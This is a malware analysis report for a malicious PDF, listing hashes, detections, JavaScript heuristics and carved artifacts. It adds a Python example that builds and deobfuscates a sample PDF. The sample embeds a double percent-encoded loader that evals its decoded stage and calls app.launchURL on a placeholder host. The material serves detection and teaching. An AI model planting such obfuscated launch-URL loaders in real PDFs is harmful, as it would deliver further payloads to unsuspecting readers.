Malicious PDF — malware analysis report

Static analysis result for SHA-256 a339988f2ab73048…

Verdict: MALICIOUS

File type: PDF

Size: 45.0 KB

MD5: 5569df0e894021a645c4d65ea0c5462e
SHA-1: 0e2007f2b0e4d0a1a31c22ee1b5edde585ca8864
SHA-256: a339988f2ab73048c06c162fdb70c742062b0dee4678992767206dafa8ad9964

Risk Score: 76

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1204.002 User Execution: Malicious File

The critical ClamAV heuristic flags the file as malicious under the signature name 'Pdf.Exploit.Agent-36128'; the name is a generic one and does not by itself identify a specific vulnerability or malware family. Two low-severity heuristics confirm that the PDF carries JavaScript, both as a /JavaScript action and as a /JS stream. The document body is otherwise uninformative, so the script is the file's only substantive content. PDF readers execute such JavaScript natively, and in malicious documents it is commonly used either to trigger a vulnerability in the reader or to download and execute further stages; the embedded script is therefore the likely attack vector, and the carved artifacts below are what to examine. Note that embedded JavaScript alone does not prove an exploit, since benign interactive forms also use it, and that the PowerShell mapping (T1059.001) is not supported by anything shown on this page and should be confirmed against the decoded script.

Heuristics (3)

  • ClamAV: Pdf.Exploit.Agent-36128 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action [low, PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low, PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj0008_000.js
SHA-256:  29e305e148515d6ad762776607013c8253b4e769d70efbd830667b84872d7387
Kind:     pdf-javascript-stream
Source:   PDF /JS object 8 at offset 0x1E7
Size:     45305 bytes

Filename: legacy_pdfkit_stage_000.js
SHA-256:  758dda3ce6d59ef37e0e319d39ac2111270f07fb8583c9e9e1b3f463f4ffcdf9
Kind:     deobfuscated-js
Source:   double percent-decoded annotation JavaScript at offset 0x1E7
Size:     33047 bytes
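As an added worked example (not the scanner's own code, and not derived from the sample, whose script content this page does not show), the following Python reproduces the pipeline behind the two low-severity heuristics and the artifact table on a constructed PDF: it flags /JavaScript and /JS, carves the stream that /JS references by object number and absolute offset, inflates it when it is FlateDecode-compressed, hashes it, and then peels percent-encoding off the loader's string literal layer by layer until a plain stage emerges, which is the "double percent-decoded" step. The PDF structure, the app.launchURL stage and the example.invalid URL are all constructed for the example.

```python
import hashlib
import re
import zlib
from urllib.parse import unquote

# ---- Constructed sample (NOT the report's sample) ---------------------------
# Final-stage script hidden under the obfuscation; the URL is a placeholder.
STAGE_JS = 'app.launchURL("http://example.invalid/next", true);'

def percent_encode(text: str) -> str:
    """Encode every byte as %XX, the form JavaScript's unescape() undoes."""
    return "".join("%%%02X" % b for b in text.encode())

# Loader stored in the /JS stream: the stage is percent-encoded twice and
# unwrapped with unescape(unescape()), the layering behind a
# "double percent-decoded" artifact.
LOADER_JS = ('var s="' + percent_encode(percent_encode(STAGE_JS)) + '";'
             'eval(unescape(unescape(s)));')

def build_pdf(js: str, compress: bool = False) -> bytes:
    """Minimal PDF: /OpenAction -> /JavaScript action -> /JS stream in object 8.
    xref table and trailer are omitted; the carver below does not need them."""
    body = zlib.compress(js.encode()) if compress else js.encode()
    filt = b" /Filter /FlateDecode" if compress else b""
    head = (b"%PDF-1.4\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
            b"3 0 obj << /Type /Page /Parent 2 0 R >> endobj\n"
            b"7 0 obj << /S /JavaScript /JS 8 0 R >> endobj\n")
    obj8 = b"8 0 obj << /Length %d%s >>\nstream\n" % (len(body), filt)
    return head + obj8 + body + b"\nendstream\nendobj\n%%EOF\n"

SAMPLE_PDF = build_pdf(LOADER_JS)

def javascript_heuristics(pdf: bytes) -> dict:
    """The report's two low-severity rules. Both fire on benign interactive
    forms too, so they justify a closer look, not a verdict."""
    return {"PDF_JAVASCRIPT": re.search(rb"/JavaScript\b", pdf) is not None,
            "PDF_JS": re.search(rb"/JS\b", pdf) is not None}

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", re.DOTALL)
LENGTH_RE = re.compile(rb"/Length\s+(\d+)(?:\s+\d+\s+(R))?")

def carve_js_streams(pdf: bytes) -> list:
    """Carve the stream objects that a /JS entry references (indirect refs only;
    literal /JS (...) strings are out of scope). Each hit mirrors a row of the
    artifact table: object number, absolute offset, raw size, SHA-256.
    Only /FlateDecode is inflated; streams under other filters stay raw."""
    referenced = {int(m.group(1))
                  for m in re.finditer(rb"/JS\s+(\d+)\s+\d+\s+R", pdf)}
    found = []
    for m in OBJ_RE.finditer(pdf):
        num, body = int(m.group(1)), m.group(2)
        s = re.search(rb"stream\r?\n", body)
        if num not in referenced or s is None:
            continue
        start = s.end()
        length = LENGTH_RE.search(body[:start])
        if length and not length.group(2):       # direct /Length integer
            raw = body[start:start + int(length.group(1))]
        else:                                    # no usable /Length: use keyword
            raw = body[start:body.find(b"endstream", start)].rstrip(b"\r\n")
        data = zlib.decompress(raw) if b"/FlateDecode" in body[:start] else raw
        found.append({"object": num, "offset": m.start(2) + start,
                      "size": len(raw), "sha256": hashlib.sha256(raw).hexdigest(),
                      "js": data.decode("latin-1")})
    return found

STRING_LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')

def deobfuscate(js: str, max_layers: int = 8) -> dict:
    """Peel percent-encoding off the longest string literal until it stops
    changing, and note whether the loader evals what it decodes. urllib's
    unquote() does not know JavaScript's %uXXXX form; that needs its own pass."""
    literals = [a or b for a, b in STRING_LITERAL_RE.findall(js)]
    stage, layers = (max(literals, key=len) if literals else ""), 0
    while layers < max_layers:
        decoded = unquote(stage)
        if decoded == stage:
            break
        stage, layers = decoded, layers + 1
    return {"stage": stage, "layers": layers,
            "evals_decoded": re.search(r"eval\s*\(\s*unescape", js) is not None}

def analyze(pdf: bytes) -> dict:
    """Heuristics plus carved-and-decoded /JS artifacts, like the report page."""
    report = {"heuristics": javascript_heuristics(pdf), "artifacts": []}
    for art in carve_js_streams(pdf):
        art.update(deobfuscate(art["js"]))
        report["artifacts"].append(art)
    return report

if __name__ == "__main__":
    for a in analyze(SAMPLE_PDF)["artifacts"]:
        print("obj %d @0x%X, %d bytes, %d percent layer(s): %s"
              % (a["object"], a["offset"], a["size"], a["layers"], a["stage"]))
```

On a real file, replace SAMPLE_PDF with the bytes read from disk. The two heuristics will also fire on legitimate forms, so the decision comes from the decoded stage: an eval of unescaped data, app.launchURL or similar network calls, or code shaped to trigger a reader bug are what deserve scoring, which is why the report itself keeps the generic JavaScript rules at low severity.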